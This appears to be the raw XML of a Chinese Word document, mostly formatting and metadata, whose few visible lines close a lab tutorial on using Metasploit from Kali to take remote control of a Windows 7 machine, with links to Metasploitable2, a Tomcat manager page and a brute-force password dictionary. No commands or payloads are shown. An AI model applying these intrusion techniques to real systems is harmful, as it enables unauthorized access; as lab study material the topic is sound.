          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00F87BD0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在kali中远程控制win7。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7C41D0" w14:textId="3EA21960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FF5A8EC" w14:textId="77777777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E5E2FFC" w14:textId="6BB45622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73AF52F" w14:textId="6071F771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87BD0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>到此，我们就完成了对win7的渗透攻击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C92C55E" w14:textId="45741A1A" w:rsidR="00F87BD0" w:rsidRPr="00F87BD0" w:rsidRDefault="00F87BD0" w:rsidP="00F87BD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资料来源：</w:t>
      </w:r>
      <w:hyperlink r:id="rId96" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>使用Metasploit渗透攻击Windows7并远程执行命令 - 知乎 (zhihu.com)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr w:rsidR="00F87BD0" w:rsidRPr="00F87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1D828" w14:textId="77777777" w:rsidR="00F907F5" w:rsidRDefault="00F907F5" w:rsidP="00A048C5">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4AFFF07E" w14:textId="77777777" w:rsidR="00F907F5" w:rsidRDefault="00F907F5" w:rsidP="00A04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3111C" w14:textId="77777777" w:rsidR="00F907F5" w:rsidRDefault="00F907F5" w:rsidP="00A048C5">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="548FA6F4" w14:textId="77777777" w:rsidR="00F907F5" w:rsidRDefault="00F907F5" w:rsidP="00A04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32A66"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="92983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32B82"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8E4CA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C00FDC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1E004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72C9A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="98FC8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214645"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0F22D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CF6984"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9550B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C30EF0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="60C8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AB7CCB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="78D2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131D48"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FBCC8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0B7464"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BDC4A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306B9B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F3E0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514598"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="37947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D023A4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="01240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0441394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90525204">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="154146600">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="414519857">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="636447722">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1697459041">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="731077353">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1688481510">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="2066905195">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="34736510">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="942421433">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="814376842">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1866867859">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="13299886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585"/>
    <w:rsid w:val="00126DCB"/>
    <w:rsid w:val="001717F1"/>
    <w:rsid w:val="00194A53"/>
    <w:rsid w:val="00222CA1"/>
    <w:rsid w:val="002268A4"/>
    <w:rsid w:val="0029157E"/>
    <w:rsid w:val="002C2E6C"/>
    <w:rsid w:val="003123BF"/>
    <w:rsid w:val="003D3E1F"/>
    <w:rsid w:val="004004E7"/>
    <w:rsid w:val="00480FF3"/>
    <w:rsid w:val="004B686C"/>
    <w:rsid w:val="004F460F"/>
    <w:rsid w:val="005C53F9"/>
    <w:rsid w:val="006116D1"/>
    <w:rsid w:val="00652C9A"/>
    <w:rsid w:val="00654278"/>
    <w:rsid w:val="006E787C"/>
    <w:rsid w:val="0073161F"/>
    <w:rsid w:val="00760E14"/>
    <w:rsid w:val="007A1B7E"/>
    <w:rsid w:val="00806831"/>
    <w:rsid w:val="00841C7C"/>
    <w:rsid w:val="008F7B9F"/>
    <w:rsid w:val="0092002F"/>
    <w:rsid w:val="00985686"/>
    <w:rsid w:val="009B4B37"/>
    <w:rsid w:val="009E0022"/>
    <w:rsid w:val="009E772B"/>
    <w:rsid w:val="00A048C5"/>
    <w:rsid w:val="00A138A3"/>
    <w:rsid w:val="00A169D0"/>
    <w:rsid w:val="00A424D2"/>
    <w:rsid w:val="00AA2CF8"/>
    <w:rsid w:val="00AD1D63"/>
    <w:rsid w:val="00B901BE"/>
    <w:rsid w:val="00C2154E"/>
    <w:rsid w:val="00C3225E"/>
    <w:rsid w:val="00C3751B"/>
    <w:rsid w:val="00CC2255"/>
    <w:rsid w:val="00D320F7"/>
    <w:rsid w:val="00D77CDD"/>
    <w:rsid w:val="00DA3163"/>
    <w:rsid w:val="00DB21F3"/>
    <w:rsid w:val="00DD6D99"/>
    <w:rsid w:val="00E43C96"/>
    <w:rsid w:val="00E94585"/>
    <w:rsid w:val="00F3450B"/>
    <w:rsid w:val="00F45132"/>
    <w:rsid w:val="00F808C7"/>
    <w:rsid w:val="00F87BD0"/>
    <w:rsid w:val="00F907F5"/>
    <w:rsid w:val="00F9271C"/>
    <w:rsid w:val="00FC4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EA23E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{563CE148-EA67-4CF5-8EA1-9BD4020C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8C5"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A048C5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7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8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8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8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8C5"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="00A048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271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126DC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26D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23866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  <w:div w:id="903219905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</w:divsChild>
    </w:div>
    <w:div w:id="8745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github.com/arthur0081/Blasting_dictionary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hyperlink" Target="https://zhuanlan.zhihu.com/p/39406664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hyperlink" Target="https://sourceforge.net/projects/metasploitable/files/Metasploitable2/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://xn--ip-on6cx8lt2p:%E7%AB%AF%E5%8F%A3/manager/html%E3%80%82" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.122.185/filetypes%E8%AE%BF%E9%97%AE%E4%B8%BB%E6%9C%BA%EF%BC%8C%E5%B0%86%E4%BA%A7%E7%94%9F%E6%B4%BB%E8%B7%83%E7%9A%84%E4%BC%9A%E8%AF%9D%E3%80%82" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sourceforge.net/projects/metasploitable/files/Metasploitable2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66</Pages>
  <Words>2171</Words>
  <Characters>12380</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>103</Lines>
  <Paragraphs>29</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>14522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san</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>zhang san</cp:lastModifiedBy>
  <cp:revision>44</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-20T02:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-05T03:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>